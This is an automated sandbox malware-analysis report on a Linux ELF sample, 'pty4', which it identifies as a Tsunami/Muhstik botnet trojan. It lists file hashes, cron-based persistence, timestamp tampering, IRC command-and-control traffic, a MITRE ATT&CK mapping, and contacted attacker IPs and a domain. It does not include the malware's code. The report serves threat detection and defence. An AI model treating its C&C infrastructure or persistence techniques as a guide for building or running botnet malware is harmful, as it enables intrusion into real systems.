Linux Analysis Report pty4
Overview
General Information
Sample Name: | pty4 |
Analysis ID: | 544443 |
MD5: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
SHA1: | 0193f962cf141afd8be8d5d252ac7c2511138860 |
SHA256: | 601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6 |
Tags: | elflog4j |
Infos: |
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Analysis Advice |
---|
All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work |
All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 544443 |
Start date: | 23.12.2021 |
Start time: | 11:26:08 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 47s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | pty4 |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Detection: | MAL |
Classification: | mal96.troj.evad.lin@0/23@2/0 |
Process Tree |
---|
|
Yara Overview |
---|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Tsunami | Yara detected Tsunami | Joe Security | ||
JoeSecurity_Muhstik | Yara detected Muhstik | Joe Security | ||
JoeSecurity_Tsunami | Yara detected Tsunami | Joe Security | ||
JoeSecurity_Muhstik | Yara detected Muhstik | Joe Security | ||
JoeSecurity_Tsunami | Yara detected Tsunami | Joe Security | ||
Click to see the 19 entries |
Jbx Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: |
Uses IRC for communication with a C&C | Show sources |
Source: | IRC traffic detected: |
Uses known network protocols on non-standard ports | Show sources |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | Program segment: |
Source: | Classification label: |
Persistence and Installation Behavior: |
---|
Writes identical ELF files to multiple locations | Show sources |
Source: | File with SHA-256 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 written: | Jump to dropped file | ||
Source: | File with SHA-256 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 written: | Jump to dropped file | ||
Source: | File with SHA-256 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 written: | Jump to dropped file | ||
Source: | File with SHA-256 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 written: | Jump to dropped file |
Sample tries to persist itself using cron | Show sources |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Explicitly modifies time stamps using the "touch" command | Show sources |
Source: | Touch executable uses timestamp modification options: | Jump to behavior | ||
Source: | Touch executable uses timestamp modification options: | Jump to behavior | ||
Source: | Touch executable uses timestamp modification options: | Jump to behavior | ||
Source: | Touch executable uses timestamp modification options: | Jump to behavior | ||
Source: | Touch executable uses timestamp modification options: | Jump to behavior |
Executes the "crontab" command typically for achieving persistence | Show sources |
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File written: | Jump to dropped file | ||
Source: | File written: | Jump to dropped file | ||
Source: | File written: | Jump to dropped file | ||
Source: | File written: | Jump to dropped file |
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior | ||
Source: | Grep executable: | Jump to behavior |
Source: | Crontab like entry written: | Jump to dropped file | ||
Source: | Crontab like entry written: | Jump to dropped file | ||
Source: | Crontab like entry written: | Jump to dropped file | ||
Source: | Crontab like entry written: | Jump to dropped file | ||
Source: | Crontab like entry written: | Jump to dropped file |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior |
Source: | Touch executable: | Jump to behavior | ||
Source: | Touch executable: | Jump to behavior | ||
Source: | Touch executable: | Jump to behavior | ||
Source: | Touch executable: | Jump to behavior | ||
Source: | Touch executable: | Jump to behavior |
Source: | Stderr: cat: /etc/inittabno crontab for root: No such file or directoryno crontab for rootno crontab for root: |
Hooking and other Techniques for Hiding and Protection: |
---|
Uses known network protocols on non-standard ports | Show sources |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Stealing of Sensitive Information: |
---|
Yara detected Muhstik | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Yara detected Tsunami | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Muhstik | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Yara detected Tsunami | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scheduled Task/Job11 | Scheduled Task/Job11 | Scheduled Task/Job11 | Scripting1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scripting1 | At (Linux)1 | At (Linux)1 | Timestomp1 | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux)1 | Logon Script (Windows) | Logon Script (Windows) | Indicator Removal on Host1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | File Deletion1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud |
Malware Configuration |
---|
No configs have been found |
---|
Behavior Graph |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
37% | Virustotal | Browse | ||
44% | ReversingLabs | Linux.Trojan.Tsunami |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
37% | Virustotal | Browse | ||
44% | ReversingLabs | Linux.Trojan.Tsunami | ||
37% | Virustotal | Browse | ||
44% | ReversingLabs | Linux.Trojan.Tsunami | ||
37% | Virustotal | Browse | ||
44% | ReversingLabs | Linux.Trojan.Tsunami | ||
37% | Virustotal | Browse | ||
44% | ReversingLabs | Linux.Trojan.Tsunami |
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
l.deutschland-zahlung.net | unknown | unknown | true | unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
198.8.91.14 | unknown | United States | 46562 | TOTAL-SERVER-SOLUTIONSUS | false | |
156.67.220.165 | unknown | Cyprus | 47583 | AS-HOSTINGERLT | true | |
23.95.222.119 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Runtime Messages |
---|
Command: | /tmp/pty4 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | |
Standard Error: | cat: /etc/inittabno crontab for root : No such file or directory no crontab for root no crontab for root |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
156.67.220.165 | Get hash | malicious | Browse | ||
23.95.222.119 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
109.202.202.202 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
91.189.91.43 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TOTAL-SERVER-SOLUTIONSUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
AS-COLOCROSSINGUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
AS-HOSTINGERLT | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | /usr/bin/cp |
File Type: | |
Category: | dropped |
Size (bytes): | 44884 |
Entropy (8bit): | 7.871246036237381 |
Encrypted: | false |
SSDEEP: | 768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p |
MD5: | 7B4F1C79F1EDCB6B36A92DEBD5A81B96 |
SHA1: | 0193F962CF141AFD8BE8D5D252AC7C2511138860 |
SHA-256: | 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 |
SHA-512: | D4CDC2897A6E22E1F8A246BFDBAC358DEBE8E48DA4B74E6B0ABD45F3EED8B0EC44EA50C2344C84325CAE13E70019023ACD99872C772B5F6F0BCEF67A6CAFA1CF |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | /usr/bin/cat |
File Type: | |
Category: | dropped |
Size (bytes): | 142 |
Entropy (8bit): | 4.326664977926882 |
Encrypted: | false |
SSDEEP: | 3:IQfXzstufXPXzsm3V6vVfXPXzsqsRufXPXzsqjKYbfXPXzsqz:IQr/x3+V/I8/rb/f |
MD5: | BD60346A01F1B4BDE9993A6BAA8183A2 |
SHA1: | EC6A317AD472790B18D0B662AC6992E226041C3E |
SHA-256: | 53ACA2A49A912146645BBB47D0ABB1827520434ABB907CADF77BC55B2572B099 |
SHA-512: | C960E7D898096547CECEE2376226203F2EF9AE88185B6AD52A4ECAC742AA60C1EA699FC167A86201B9BC0102F029ACC296C8A7BCD4E9F5793D5310CDB4FAA098 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /bin/sh |
File Type: | |
Category: | dropped |
Size (bytes): | 29 |
Entropy (8bit): | 4.090234012145145 |
Encrypted: | false |
SSDEEP: | 3:IQfXzsqz:IQP |
MD5: | D36AF1B2908091A8DCAADAED98DC9460 |
SHA1: | 47189FCB10685324FAA8DEF45669F784444479BB |
SHA-256: | 79A96E3165984BE3826784DA22D53CFCA134C75E87E394D3A35876FBEEEA610C |
SHA-512: | 88BBCD7A72A8869652D7BEC1C0262B6896B9A5C9AFFB8AD2A78BAF5C90079D5B01AECD2DFCC7F13010FBCC8C4B73A097822C804640493D197319E008D1C00228 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/cp |
File Type: | |
Category: | dropped |
Size (bytes): | 44884 |
Entropy (8bit): | 7.871246036237381 |
Encrypted: | false |
SSDEEP: | 768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p |
MD5: | 7B4F1C79F1EDCB6B36A92DEBD5A81B96 |
SHA1: | 0193F962CF141AFD8BE8D5D252AC7C2511138860 |
SHA-256: | 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 |
SHA-512: | D4CDC2897A6E22E1F8A246BFDBAC358DEBE8E48DA4B74E6B0ABD45F3EED8B0EC44EA50C2344C84325CAE13E70019023ACD99872C772B5F6F0BCEF67A6CAFA1CF |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | /usr/bin/cp |
File Type: | |
Category: | dropped |
Size (bytes): | 44884 |
Entropy (8bit): | 7.871246036237381 |
Encrypted: | false |
SSDEEP: | 768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p |
MD5: | 7B4F1C79F1EDCB6B36A92DEBD5A81B96 |
SHA1: | 0193F962CF141AFD8BE8D5D252AC7C2511138860 |
SHA-256: | 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 |
SHA-512: | D4CDC2897A6E22E1F8A246BFDBAC358DEBE8E48DA4B74E6B0ABD45F3EED8B0EC44EA50C2344C84325CAE13E70019023ACD99872C772B5F6F0BCEF67A6CAFA1CF |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 387 |
Entropy (8bit): | 4.8972080073755855 |
Encrypted: | false |
SSDEEP: | 12:8QjHig8pXVDeHLU9YumqzKMmq16mq05mqQY:8+2DALUqPqIq5q9qf |
MD5: | 0AEEA9C0CF1E605D1C32C770116811FA |
SHA1: | 2DB529A7F9B104A2D588DBD01309EA1173963B9D |
SHA-256: | 3AD0DF9C8F1EE0B623BD038808DFCA647D05878956C71766B24DCE153A0C2A13 |
SHA-512: | 9267EC2B2A1F4FF3BF15CDAF4C4CD161D321883BBBED8F6EE92ECBB3D5571AB2A38F04D8E8811541CC6E8872A97DD5A3F6B915D5E786AB2BDCCBBC354496A12F |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 214 |
Entropy (8bit): | 5.119840870160048 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQL/ZdGMQ5UYLtCFt39YBC0AgFz:8QjHig81deHLU9YuY |
MD5: | F27B5E9C1AD82B55B346A8CAC385FA8C |
SHA1: | D525DDB3972D3589F4F03154DC839799F332D157 |
SHA-256: | EC12A6E3E3E41E379EE2715C9BFB8BF1FDF7E2D8427D15FB7012442C9CA80464 |
SHA-512: | B5824E77F18E936D58097FE46D422ADE8777DA458808C31F579C93F06D3D3208B07848F8463C49C68F93F5CEC46402EF508518C830E538CDCA3021A65D878908 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 257 |
Entropy (8bit): | 5.077584953913084 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQL//dGMQ5UYLtCFt39YBC0AgF5qzK3Ub0AgFz:8QjHig8heHLU9YumqzKMY |
MD5: | C0FB58CBA6DD21C6860D1C23673EB946 |
SHA1: | 3F14C66521E981207DE24838D91AB228D91EA30C |
SHA-256: | 0917CC44A428CE6C88894AC23565DC4DB23CE7C92D157116EF8C26B8750DB12F |
SHA-512: | 3038502C39EF45F0126E0B280E0F6DBB8EC732989A448E8E217EF07F8448FD25A3AE5EB23EBD0DB7A7D0F8A871E8D71FA55BC50015D9BC3B357C7AA445C9AC96 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.01078377746558 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQL//dGMQ5UYLtCFt39YBC0AgF5qzK3Ub0AgF5qIajUa:8QjHig8heHLU9YumqzKMmq16Y |
MD5: | C0ADE17573AD8481FDC7E1F42CD4BD33 |
SHA1: | 9C697B102CCE78F6605515A2F8EA3C26FD960457 |
SHA-256: | A560BE928DB6B7BD572FB8CC31C04E33A72B833827313F6AC01C3A5FB2D6A4F3 |
SHA-512: | E951E5C9391D0F9C3B22EDBF5035F6285AFD8EB47FC2885D5CD2985A0FE785D254C520BE443F7263308B6C5A1FBFE6F43FA65EB0996916EB219856CEC8F201E9 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 4.959384391149962 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQL/lXVX/GMQ5UYLtCFt39YBC0AgF5qzK3Ub0AgF5qIF:8QjHig8pXVDeHLU9YumqzKMmq16mq05Y |
MD5: | F5AE8DD3B579745556ECFDCF7BE4139C |
SHA1: | 820F1CF68D965E66428285BFF491AD4B3CE59780 |
SHA-256: | 94A9BD464AAFC4BD4FE1C510BA9886E7647F4AFF3C9F7D7329A4AE3A4F1BEE74 |
SHA-512: | 3E3215B0477376062F31DE72FBDFE9D9BFA6387E4ADFA41BF54B79997CC1CE6FBDE96717B151BBCF3BB9C488704E916C5EE8B64AE0AF56B6B1EB51E4C25EF955 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/cp |
File Type: | |
Category: | dropped |
Size (bytes): | 44884 |
Entropy (8bit): | 7.871246036237381 |
Encrypted: | false |
SSDEEP: | 768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p |
MD5: | 7B4F1C79F1EDCB6B36A92DEBD5A81B96 |
SHA1: | 0193F962CF141AFD8BE8D5D252AC7C2511138860 |
SHA-256: | 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 |
SHA-512: | D4CDC2897A6E22E1F8A246BFDBAC358DEBE8E48DA4B74E6B0ABD45F3EED8B0EC44EA50C2344C84325CAE13E70019023ACD99872C772B5F6F0BCEF67A6CAFA1CF |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.871246036237381 |
TrID: |
|
File name: | pty4 |
File size: | 44884 |
MD5: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
SHA1: | 0193f962cf141afd8be8d5d252ac7c2511138860 |
SHA256: | 601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6 |
SHA512: | d4cdc2897a6e22e1f8a246bfdbac358debe8e48da4b74e6b0abd45f3eed8b0ec44ea50c2344c84325cae13e70019023acd99872c772b5f6f0bcef67a6cafa1cf |
SSDEEP: | 768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p |
File Content Preview: | .ELF....................p...4...........4. ...(......................................................................................j...j......a........?d..ELF.......d...m...4..h.. .(.....~m..-.#..5...c...............m.$..R...Q.td................H.45.... |
Static ELF Info |
---|
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | |
Entry Point Address: | |
Flags: | |
ELF Header Size: | |
Program Header Offset: | |
Program Header Size: | |
Number of Program Headers: | |
Section Header Offset: | |
Section Header Size: | |
Number of Section Headers: | |
Header String Table Index: |
Program Segments |
---|
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0xc01000 | 0xc01000 | 0xadec | 0xadec | 4.4178 | 0x5 | R E | 0x1000 | ||
LOAD | 0x7e4 | 0x80617e4 | 0x80617e4 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x1000 |
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/23/21-11:26:58.030802 | TCP | 2034743 | ET TROJAN ELF/Muhstik Botnet CnC Activity | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 23, 2021 11:26:53.253879070 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 23, 2021 11:26:53.765599012 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
